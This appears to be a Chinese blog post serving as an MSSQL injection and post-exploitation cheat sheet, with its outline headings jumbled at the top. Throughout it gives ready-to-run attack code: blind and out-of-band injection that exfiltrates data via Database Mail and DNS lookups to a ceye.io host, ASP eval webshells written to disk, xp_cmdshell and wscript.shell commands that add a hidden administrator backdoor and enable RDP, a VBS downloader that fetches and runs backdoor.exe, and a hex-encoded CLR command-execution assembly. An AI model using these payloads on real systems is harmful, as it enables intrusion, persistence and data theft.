注释符: 1. 获取标志信息 2. 枚举数据库 若显示有个数限制,可用 2.时间盲注 3.数据带外 1. bulk insert 2. Scripting.FileSystemObject 3. xp_cmdshell 1. Scripting.FileSystemObject 要求: 2. xp_cmdshell 要求:全建立在 2. sp_oacreate 3. 有回显的wscript.shell 命令执行 4. 木马下载 5. .NET CLR 1. 利用日志差异,备份(asp文件更小,首选) 2. 利用数据库差异备份(会导致asp比较很大,执行较慢)0. 搭建mssql2012
https://qsh5.cn/327.html
1. Remove all SQL Server components from 'Programs and Features'
2. Backup the registry
3. Delete the following keys in regedit: --HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server --HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer
4. Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall and delete all the sub-keys referencing SQL Server
5. Go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services and delete all the keys referencing SQL Server
6. Rename all the SQL Server folders in the computer
7. Reboot the machine
sp_configure 'show advanced options',1;
reconfigure;
sp_configure 'xp_cmdshell',1;
reconfigure;
exec sp_configure 'show advanced options',1
reconfigure
exec sp_configure 'Ad Hoc Distributed Queries',1
reconfigure
2. mssql injection
--
/**/
select @@version //查询版本信息
select '1'+'1' //11 sqlserver 字符合并
select system_user // 查看当前连接用户
select db_name() // 查看当前数据库
select name,sys.fn_varbintohexstr(password_hash) from sys.sql_logins //查看用户及其hash
select SERVERPROPERTY('IsIntegratedSecurityOnly') //1 用的是windows认证,0用的是混和认证
select is_srvrolemember('sysadmin'),is_member('db_owner') //角色判断
top + not in
配合取出所有数据
1. select name from master..sysdatabases -- //枚举数据库
2. select name from webtest..sysobjects where xtype='U' -- //webtest数据库,查看数据库中的表
3. select name from webtest..syscolumns where id=(select id from webtest..sysobjects where name='good') -- //查看数据库中的列,webtest是数据库,good是表
4. select id,name from webtest..good -- //查看数据
1. select catalog_name from information_schema.schemata -- //获取数据库
2. select table_name from information_schema.tables -- //获取表名
3. select column_name from information_schema.columns where table_name='xxxx' -- //获取列名
4. select id,name from good-- //获取数据
1. if() express1 else express 2 //条件语句
2. waitfor delay 'hh:mm:ss' //延时函数
e.g.:id=1;if(system_user='sa') waitfor delay '00:00:05' --
e.g.:id=1;if(system_user='sa') exec master..xp_cmdshell 'ping -n 5 127.0.0.1'
3. len() //长度函数
4. ascii() // ascii函数
5. substring(express,start,stop) // 字符串截取函数
环境要求:sysadmin
权限
邮件账户信息要求:能够认证的smtp服务器或者自己搭建的--开启发邮件功能
exec sp_configure 'show advanced options',1
reconfigure with override
exec sp_configure 'database mail xps',1
reconfigure with override
--创建邮件帐户信息
exec msdb.dbo.sysmail_add_account_sp
@account_name ='hacker', -- 邮件帐户名称
@email_address ='[email protected]', -- 发件人邮件地址
@display_name ='SQLServer2012', -- 发件人姓名
@MAILSERVER_NAME = 'smtp.163.com', -- 邮件服务器地址
@PORT =25, -- 邮件服务器端口
@USERNAME = 'xxx', -- 用户名
@PASSWORD = 'xxx' -- 密码(授权码)
--数据库配置文件
exec msdb.dbo.sysmail_add_profile_sp
@profile_name = 'SQLServer_test', -- 配置名称
@description = '数据库邮件配置文件' -- 配置描述
--用户和邮件配置文件相关联
exec msdb.dbo.sysmail_add_profileaccount_sp
@profile_name = 'SQLServer_test', -- 配置名称
@account_name = 'hacker', -- 邮件帐户名称
@sequence_number = 1 -- account 在 profile 中顺序(默认是1)
exec msdb.dbo.sp_send_dbmail
@profile_name = 'SQLServer_test', --配置名称
@recipients = '[email protected]', --收件名称
@body_format = 'HTML', --内容格式
@subject = '文章标题',
@body = '邮件内容',
@query = 'select @@version' --此处既是数据带外查询
环境要求:sysadmin
角色的用户
ps:存储过程的参数列表禁止用字符串连接,所以用一个中间变量
替代品:xp_fileexists,xp_subdirs,xp_getfiledetails(2000),sp_add_jobstep
可能问题:dns和unc会有长度限制,可以通过substring
和sys.fn_varbintohexstr
解决:
sys.fn_varbintohexstr(cast((select @@version) as varbinary(255)))
DECLARE @data varchar(1024),@a varchar(1024)
select @data = (SELECT system_user)
set @a = '\\1' + @data + '.xxx.ceye.io\abc'
exec master..xp_dirtree @a
3. mssql 文件操作
1. 读文件
要求:sysadmin
、具有文件的读权限create table books(line varchar(1024))
bulk insert books from 'c:\Users\youncyb\a.txt'
select * from books
要求:sysadmin
、文件读取权限#开启Ole Automation Procedures
sp_configure 'show advanced options',1;
RECONFIGURE;
sp_configure 'Ole Automation Procedures',1;
RECONFIGURE;
#读文件操作
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\temp\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'
2. 写文件
sysadmin
、目录写权限exec sp_configure 'show advanced options',1
reconfigure
exec sp_configure 'Ole Automation Procedures',1
reconfigure
declare @o int, @f int, @t int, @ret int
declare @line varchar(1024)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\temp\test.txt', 1 --1表示覆盖
exec @ret=sp_oamethod @f, 'writeline', NULL, '<%eval request("cmd")%>'
要求:sysadmin
、目录写权限exec master..xp_cmdshell 'echo ^<%eval request("cmd")%^> >c:\temp\shell.aspx'
4. 命令执行
sysadmin
权限下
1. xp_cmdshell#开启 ole automation procedures
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'Ole Automation Procedures', 1
RECONFIGURE
EXEC sp_configure 'show advanced options', 0
#利用wscript.shell 执行命令 添加后门用户
declare @shell int
exec sp_oacreate 'wscript.shell', @shell out
exec sp_oamethod @shell, 'run', null, 'cmd.exe /c net user hacker hacker$ /add'
exec sp_oamethod @shell, 'run', null, 'cmd.exe /c net localgroup administrators hacker$ /add'
exec sp_oamethod @shell, 'run', null, 'cmd.exe /c reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccount\UserList" /v hacker$ /t REG_DWORD /d 0 /f'
exec sp_oamethod @shell, 'run', null, 'cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
declare @shell int,@exec int,@text int,@str varchar(8000)
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@shell output
exec sp_oamethod @shell,'exec',@exec output,'cmd.exe /c ping www.baidu.com'
exec sp_oamethod @exec, 'StdOut', @text out
exec sp_oamethod @text, 'readall', @str out
select @str
declare @shell int
exec sp_oacreate 'wscript.shell', @shell out
exec sp_oamethod @shell, 'run', null, 'echo set a=createobject("adod"+"b.stream"):set w=createobject("Msxm"+"l2.ServerXMLHTTP"):w.open"get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 > c:\temp\download.vbs&cscript download.vbs http://192.168.239.1:8080/backdoor.exe c:\temp\backdoor.exe&c:\temp\backdoor.exe&del c:\temp\backdoor.exe \q \f '
#启动CLR
exec sp_configure 'show advanced options' ,1
RECONFIGURE
exec sp_configure 'clr enabled',1
RECONFIGURE
#利用assembly 加载.net 二进制程序,这里直接用一下luan师傅的
alter database master set trustworthy on
CREATE ASSEMBLY luan_exec FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c01030029d16a5a0000000000000000e00022200b013000000a00000006000000000000be2800000020000000400000000000100020000000020000040000000000000004000000000000000080000000020000000000000300408500001000001000000000100000100000000000001000000000000000000000006c2800004f000000004000007c03000000000000000000000000000000000000006000000c000000342700001c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000c408000000200000000a000000020000000000000000000000000000200000602e727372630000007c0300000040000000040000000c0000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001000000000000000000000000000004000004200000000000000000000000000000000a0280000000000004800000002000500c4200000700600000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000133003005f00000000000000730e00000a256f0f00000a026f1000000a256f0f00000a176f1100000a256f0f00000a166f1200000a256f0f00000a176f1300000a256f0f00000a176f1400000a256f0f00000a036f1500000a256f1600000a266f1700000a6f1800000a2a1e02281900000a2a0042534a4201000100000000000c00000076322e302e35303732370000000005006c00000020020000237e00008c020000ec02000023537472696e6773000000007805000004000000235553007c0500001000000023475549440000008c050000e400000023426c6f620000000000000002000001471500000900000000fa0133001600000100000013000000020000000200000002000000190000000d00000001000000020000000000a0010100000000000600f90054020600660154020600460022020f007402000006006e00b5010600dc00b5010600bd00b50106004d01b50106001901b50106003201b50106008500b50106005a0035020600380035020600a000b50106009902a9010a00830222020a00d90122020600ea010a000600f7010a000000000001000000000001000100010010001d00b0013d00010001005020000000009600c70135000100bb200000000086181c0206000300000001009801000002009c0109001c02010011001c02060019001c020a0029001c02100031001c02100039001c02100041001c02100049001c02100051001c02100059001c02100061001c02150069001c02100071001c02100081001c0206008100cb011a0089002b0010008900d90215008900840115008900be02150089000202150089008b0210008100a0021f008100ab02230099002100280079001c0206002e000b003b002e00130044002e001b0063002e0023006c002e002b0076002e00330076002e003b007c002e0043006c002e004b008b002e00530076002e005b0076002e006300ac002e006b00d600048000000100000000000000000000000000a60200000200000000000000000000002c001400000000000200000000000000000000002c00a901000000000000003c4d6f64756c653e0053797374656d2e494f006d73636f726c696200636d640052656164546f456e64007365745f46696c654e616d6500477569644174747269627574650044656275676761626c6541747472696275746500436f6d56697369626c6541747472696275746500417373656d626c795469746c6541747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c45786563757465006578650061726700746573742e646c6c0053797374656d006c75616e0053797374656d2e5265666c656374696f6e0072756e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d5265616465720054657874526561646572007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e496e7465726f7053657276696365730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730050726f63657373007365745f417267756d656e7473004f626a6563740053746172740074657374006765745f5374616e646172644f7574707574007365745f52656469726563745374616e646172644f7574707574007365745f4372656174654e6f57696e646f770000000000e388bea52dd89b46bc54e92695a9106b00042001010803200001052001011111042001010e042001010204200012450320000204200012490320000e08b77a5c561934e0890500020e0e0e0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f777301080100020000000000090100047465737400000501000000000e0100094d6963726f736f667400002001001b436f7079726967687420c2a9204d6963726f736f6674203230313800002901002434363864653931652d356661622d346431632d613639392d31323937343038343437663700000c010007312e302e302e300000000000000029d16a5a00000000020000001c010000502700005009000052534453c5a291c391233540a57b8322a05f0d8601000000443a5c615c7270635c746573745c746573745c6f626a5c52656c656173655c746573742e7064620000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000942800000000000000000000ae280000002000000000000000000000000000000000000000000000a0280000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000200300000000000000000000200334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b00480020000010053007400720069006e006700460069006c00650049006e0066006f0000005c02000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000034000a00010043006f006d00700061006e0079004e0061006d006500000000004d006900630072006f0073006f00660074000000320005000100460069006c0065004400650073006300720069007000740069006f006e0000000000740065007300740000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e003000000032000900010049006e007400650072006e0061006c004e0061006d006500000074006500730074002e0064006c006c00000000005a001b0001004c006500670061006c0043006f007000790072006900670068007400000043006f0070007900720069006700680074002000a90020004d006900630072006f0073006f006600740020003200300031003800000000002a00010001004c006500670061006c00540072006100640065006d00610072006b00730000000000000000003a00090001004f0072006900670069006e0061006c00460069006c0065006e0061006d006500000074006500730074002e0064006c006c00000000002a0005000100500072006f0064007500630074004e0061006d00650000000000740065007300740000000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000c03800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
WITH PERMISSION_SET = UNSAFE
CREATE FUNCTION dbo.shell(@exe as nvarchar(200),@arg as nvarchar(200))
RETURNS nvarchar(200)
AS EXTERNAL NAME luan_exec.[luan.cmd].run
select dbo.shell('cmd.exe','whoami')
5. db_owner 权限拿webshell
IF EXISTS(select table_name from information_schema.tables where table_name='test_tmp')drop table test_tmp
alter database webtest set RECOVERY FULL
create table test_tmp (a varchar(100))
backup log webtest to disk = 'c:\temp\asp.bak' with init
insert into test_tmp values ('<%eval request("cmd")%>')
backup log webtest to disk = 'c:\temp\123.asp'
IF EXISTS(select table_name from information_schema.tables where table_name='test_tmp')drop table test_tmp;
backup database webtest to disk = 'c:\temp\asp.bak';
create table [dbo].[test_tmp] ([cmd] [image]);
insert into test_tmp(cmd) values(0x3C25657865637574652872657175657374282261222929253E);
backup database web to disk='c:\temp\asp.asp' WITH DIFFERENTIAL,FORMAT;
6. 参考
https://paper.tuisec.win/search.jsp?keywords=mssql
http://lu4n.com/mssql-get-os-shell/
Comments NOTHING